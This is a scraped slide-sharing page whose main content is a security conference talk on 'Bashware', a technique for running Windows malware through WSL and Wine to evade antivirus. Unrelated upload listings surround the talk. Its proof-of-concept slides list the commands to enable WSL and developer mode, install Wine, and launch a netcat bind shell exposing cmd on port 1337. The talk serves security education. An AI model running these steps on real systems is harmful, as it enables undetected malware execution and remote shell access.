DevOps plays a crucial role in driving digital transformation by fostering a collaborative culture between development and operations teams. This approach enhances the speed and efficiency of software delivery, ensuring quicker deployment of new features and updates. DevOps practices like continuous integration and continuous delivery (CI/CD) streamline workflows, reduce manual errors, and increase the overall reliability of software systems. By leveraging automation and monitoring tools, organizations can improve system stability, enhance customer experiences, and maintain a competitive edge. Ultimately, DevOps is pivotal in enabling businesses to innovate rapidly, respond to market changes, and achieve their digital transformation goals.
Penify - Let AI do the Documentation, you write the Code.
Penify automates the software documentation process for Git repositories. Every time a code modification is merged into "main", Penify uses a Large Language Model to generate documentation for the updated code. This automation covers multiple documentation layers, including InCode Documentation, API Documentation, Architectural Documentation, and PR documentation, each designed to improve different aspects of the development process. By taking over the entire documentation process, Penify tackles the common problem of documentation becoming outdated as the code evolves.
https://www.penify.dev/
Orca: Nocode Graphical Editor for Container Orchestration
Tool demo on CEDI/SISTEDES/JISBD2024 at A Coruña, Spain. 2024.06.18
"Orca: Nocode Graphical Editor for Container Orchestration"
by Pedro J. Molina PhD. from Metadev
Hands-on with Apache Druid: Installation & Data Ingestion Steps
Supercharge your analytics workflow with https://bityl.co/Qcuk Apache Druid's real-time capabilities and seamless Kafka integration. Learn about it in just 14 steps.
The Comprehensive Guide to Validating Audio-Visual Performances.pdf
Ensuring the optimal performance of your audio-visual (AV) equipment is crucial for delivering exceptional experiences. AV performance validation is a critical process that verifies the quality and functionality of your AV setup. Whether you're a content creator, a business conducting webinars, or a homeowner creating a home theater, validating your AV performance is essential.
Photoshop Tutorial for Beginners (2024 Edition)
Photoshop Tutorial for Beginners (2024 Edition)
Explore the evolution of programming and software development and design in 2024. Discover emerging trends shaping the future of coding in our insightful analysis."
Here's an overview:Introduction: The Evolution of Programming and Software DevelopmentThe Rise of Artificial Intelligence and Machine Learning in CodingAdopting Low-Code and No-Code PlatformsQuantum Computing: Entering the Software Development MainstreamIntegration of DevOps with Machine Learning: MLOpsAdvancements in Cybersecurity PracticesThe Growth of Edge ComputingEmerging Programming Languages and FrameworksSoftware Development Ethics and AI RegulationSustainability in Software EngineeringThe Future Workforce: Remote and Distributed TeamsConclusion: Adapting to the Changing Software Development LandscapeIntroduction: The Evolution of Programming and Software Development
Photoshop Tutorial for Beginners (2024 Edition)Explore the evolution of programming and software development and design in 2024. Discover emerging trends shaping the future of coding in our insightful analysis."Here's an overview:Introduction: The Evolution of Programming and Software DevelopmentThe Rise of Artificial Intelligence and Machine Learning in CodingAdopting Low-Code and No-Code PlatformsQuantum Computing: Entering the Software Development MainstreamIntegration of DevOps with Machine Learning: MLOpsAdvancements in Cybersecurity PracticesThe Growth of Edge ComputingEmerging Programming Languages and FrameworksSoftware Development Ethics and AI RegulationSustainability in Software EngineeringThe Future Workforce: Remote and Distributed TeamsConclusion: Adapting to the Changing Software Development LandscapeIntroduction: The Evolution of Programming and Software Development
The importance of developing and designing programming in 2024
Programming design and development represents a vital step in keeping pace with technological advancements and meeting ever-changing market needs. This course is intended for anyone who wants to understand the fundamental importance of software development and design, whether you are a beginner or a professional seeking to update your knowledge.
Course objectives:
1. **Learn about the basics of software development:
- Understanding software development processes and tools.
- Identify the role of programmers and designers in software projects.
2. Understanding the software design process:
- Learn about the principles of good software design.
- Discussing common design patterns such as Object-Oriented Design.
3. The importance of user experience (UX) in modern software:
- Explore how user experience can improve software acceptance and usability.
- Tools and techniques to analyze and improve user experience.
4. Increase efficiency and productivity through modern development tools:
- Access to the latest programming tools and languages used in the industry.
- Study live examples of applications
Upturn India Technologies - Web development company in Nashik
Nashik's top web development company, Upturn India Technologies, crafts innovative digital solutions for your success. Partner with us and achieve your goals
ACE - Team 24 Wrapup event at ahmedabad.
Atlassian Team 24 event wrap-up Ahmedabad. Recap of Atlassian team24 event.
Recently uploaded (20)
The Rising Future of CPaaS in the Middle East 2024
The Rising Future of CPaaS in the Middle East 2024
Building API data products on top of your real-time data infrastructure
Building API data products on top of your real-time data infrastructure
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Computer Science & Engineering VI Sem- New Syllabus.pdf
Computer Science & Engineering VI Sem- New Syllabus.pdf
Baha Majid WCA4Z IBM Z Customer Council Boston June 2024.pdf
Baha Majid WCA4Z IBM Z Customer Council Boston June 2024.pdf
Enhanced Screen Flows UI/UX using SLDS with Tom Kitt
Enhanced Screen Flows UI/UX using SLDS with Tom Kitt
Secure-by-Design Using Hardware and Software Protection for FDA Compliance
Secure-by-Design Using Hardware and Software Protection for FDA Compliance
Penify - Let AI do the Documentation, you write the Code.
Penify - Let AI do the Documentation, you write the Code.
Orca: Nocode Graphical Editor for Container Orchestration
Orca: Nocode Graphical Editor for Container Orchestration
Hands-on with Apache Druid: Installation & Data Ingestion Steps
Hands-on with Apache Druid: Installation & Data Ingestion Steps
The Comprehensive Guide to Validating Audio-Visual Performances.pdf
The Comprehensive Guide to Validating Audio-Visual Performances.pdf
Upturn India Technologies - Web development company in Nashik
Upturn India Technologies - Web development company in Nashik
Executing Windows Malware through WSL (Bashware)
- 1. Bashware A malware execution technique
- 2. /usr/bin/who • null and OWASP Bangalore chapter leader • A decade of security experience in various technologies • Security researcher and evangelist • Speaker and trainer at several security conferences • https://ibreak.software • @riyazwalikar | @wincmdfu
- 3. What is Bashware? • A technique researched by Check Point Security that can be used by malware to run using the Windows Subsystem for Linux (WSL) and not be detected by security solutions (like AV etc.) • Basically a way to run PE executables using the WSL • Bash + (mal)ware
- 4. Back to Basics • How does malware (pick any) infect a Windows machine? • How is it detected? Any examples of detection techniques?
- 5. An overview of WSL • WSL is a collection of components that enables native Linux ELF64 binaries to run on Windows. It contains both user mode and kernel mode components. It is primarily comprised of: • User mode session manager service that handles the Linux instance life cycle • Pico provider drivers (lxss.sys, lxcore.sys) that emulate a Linux kernel by translating Linux syscalls • Pico processes that host the unmodified user mode Linux (e.g. /bin/bash)
- 6. Demo of WSL
- 7. Bashware Video Demo • https://www.youtube.com/watch?v=fwEQFMbHIV8
- 8. Let’s build a PoC!
- 9. According to the video/blogpost • Enable WSL • Enable Developer mode • Install Linux components • Install WineHQ • Run Windows binary through Wine
- 10. Step 1: Enable WSL dism /Online /Enable-Feature /All /FeatureName:Microsoft- Windows-Subsystem-Linux /NoRestart Enable-WindowsOptionalFeature -O -F Microsoft-Windows- Subsystem-Linux
- 11. Step 2: Enable Developer mode • Set the following registry values [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionAppModelUnlock] "AllowAllTrustedApps"=dword:1 "AllowDevelopmentWithoutDevLicense"=dword:1
- 13. Step 3: Install Linux components • lxrun /install /y
- 14. Step 4: Install Wine dpkg --add-architecture i386 add-apt-repository -y ppa:ubuntu-wine/ppa apt-get update apt-get install wine1.6-amd64
- 15. Step 5: Run PE binary using wine wine64 nc64.exe -lvp 1337 -e cmd
- 16. Demo
- 17. • Riyaz Walikar • https://ibreak.software • @riyazwalikar | @wincmdfu
- 18. References • https://research.checkpoint.com/beware-bashware-new-method- malware-bypass-security-solutions/ • https://www.youtube.com/watch?v=fwEQFMbHIV8 • https://blogs.msdn.microsoft.com/wsl/2016/04/22/windows- subsystem-for-linux-overview/ • https://ibreak.software/executing-windows-malware-in-windows- subsystem-for-linux-bashware/